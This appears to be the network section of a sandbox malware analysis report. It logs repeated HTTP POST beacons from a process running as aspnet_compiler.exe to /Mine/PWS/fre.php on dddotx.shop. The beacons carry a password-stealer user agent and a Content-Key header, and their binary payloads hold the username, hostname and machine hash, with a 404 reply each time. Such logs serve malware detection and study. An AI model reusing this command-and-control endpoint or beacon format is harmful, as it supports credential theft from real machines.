                                      Oct 24, 2024 17:02:38.638010979 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:39.504625082 CEST776INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:39 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsV8TR%2BGBQet%2F1qH20FzvWqGxR8lKwDM9sq1v3PhCQFYDeaIRhOGE990FTP2VyPBsbWFdZ28zWushaUPQKNtsN0fvg%2FEGlzWWl1qIUKteRsf8uW1V0%2FHsm9HEi0vmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad95ecc776c64-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1880&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.549859188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:39.652800083 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:39.658318043 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:40.706804991 CEST776INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:40 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FtJivfOaxenTKizqzCB1r%2Bv4aaHT8%2B1meOxAHDGbtP0oWaaVTtfRuxUpiYogrNlqzh56%2BmAuSn8vmu9FsfgpvkHqgkYhY0MQEx1qMYTflqHnTehjoknPokWL7lpaOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad9653d082e25-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1025&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.549866188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:40.993042946 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:40.998847008 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:42.062196970 CEST780INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:42 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=64Gd7D9cNAC%2BWeQi18d97O%2BFHM2cC%2FGha2Okf%2Brvc8eUFr6hqhjQPUVeiElayVGGqcziWeg%2Bi3i8867%2FUsbViiFgv1uawU7xLZdhXJ8XMwfLRL8sQOHdhZZcbqblUA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad96d9f5ce534-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1343&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.549875188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:42.212672949 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:42.218169928 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:43.137540102 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:43 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1dYyk%2B1aHI9sNDhPQyR3EGfuYlNJfwCjXRNV696tm84LtYrZIZKRiIExRpL1gWYXeeiPVyhxRuWQeJ76wSyNPKQDUV%2BatY%2B2GCEe6FFOY767DdHpSeeHZ9vSpvRDJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad9753bf02cce-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1524&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.2.549881188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:43.311990023 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:43.317732096 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:45.389446974 CEST772INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:45 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ghrbr8HWaKyEIcbXbZ0uuqzCCBoVaPglJKiA339dHduFOIL1TwMzH9uHLEhdtv8%2BAJFKQF%2FhGXorIJyWH7T3YRHqZRb2ZiUn15AVXpflCNZyC8M0zoyuC9obZXehQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad97c2e8e4763-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1786&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.549893188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:45.538822889 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:45.544944048 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:46.415992022 CEST772INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:46 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62HvQa5B1PVtYXp7fNbHdRfunOPboMmWhs%2Bo8HJKl4qKlx5vp6E5gnBlKERZ7hU%2BNUm4YLqaC2YabOPWWZLNGGRN9JUBmqaTRUXE2sB8Bnv7s9SFIzwyC7kuPzILag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad98a09c7461e-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.549899188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:46.574980021 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:46.580421925 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:47.642119884 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:47 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tCtyULF3a9teyp%2FLzBS1NMYgl4ta5cmf14y7Dk989Y7UaACxYkUxtujmgeJVNyckk25svdwRLRtUBXMI%2B3iNGA7GxHcR0ky9ci5KmQcYX1oqL8kw%2F31l4xs0Dk6MWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad9906b014870-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1168&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.549907188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:47.791491985 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:47.796961069 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:50.896435022 CEST776INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:50 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wrmhXT%2FQhM99QDk7xPAxCe6xCbPwLs2OpBShj7lWk5VqdF3z4ZxqzK%2FawZtf1fg4UVkiCm6flA8%2B2hM3WJZ%2FymEZxV2TfZiol4jZzrf4AWFYwBaz51MNRjp7c44gA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad997fcc0e76e-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1105&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.549925188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:51.040842056 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:51.046250105 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:53.493185997 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:53 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UHUBncF3y283oCNqH1YGxN8eesV3mfiV2vyWI%2BgMmbFT0KJD%2FzZ08L3lMI1YIPKFfkCXo52fb96htnCG8KG1z3vTNO9PZWwT0bb4jjf58%2BvurtiTzrWYOn6dEz2JNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad9ac6f836c19-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1117&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      31192.168.2.549941188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:53.650609016 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:53.656101942 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:58.098172903 CEST778INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:58 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrcHAnxqQ5NLlGG7dBsoh3LtMe3srdBvsIEoWOawnJKWTzeTz%2Fj%2Fdr6Ykr%2Fc46CKbZPtJXY1zCjroZ01XBN27t7j%2FuiH%2FRhYNaJAmLBSycM5SnjgV2lYjhfSqh9Cbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad9bca9f82cd5-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2269&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.2.549963188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:58.240186930 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:58.245580912 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:59.277235985 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:59 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VsCeeoYNBLF9gQhR1iawkzcwxvxkKE07wgJiABNyzWBopfub38hYcQS%2Bm%2BmVRyYF4skuIH1U84tJ7vFEpeporZjtwmiOzgyJ7CupqV7aEu8Y%2FL5rdtD8T9i603uJxw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad9d96ba74672-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1147&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      33192.168.2.549968188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:59.437935114 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:59.443401098 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:00.367789030 CEST772INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:00 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZoUv%2BPPJd0tVciBSgbcPpIv5el0L6VJEeaH2uI8f9bZP7FL8JtHi%2F44nIBMvebOBfZZzFWtZNDRQOTKrCEfc1RqVcsQhg6obYszclMjrrXLVEqTszQA3aETSEf3mmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad9e0eb796b6a-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1185&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      34192.168.2.549972188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:00.540592909 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:00.546133995 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:01.522497892 CEST778INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:01 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1No8y1topIo6w43ZP%2B8Oy%2BYX%2FEsKUWLRZb19VBQnuBsLXc0CDobIBC8dWJHtjHU5eV6TwTSnKdmfsUEo%2FK3bNHQjCOjdzbQpzRM8EOfOuOfvQDurqfwjgFZfhw%2BLbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad9e7cb453abe-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1242&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
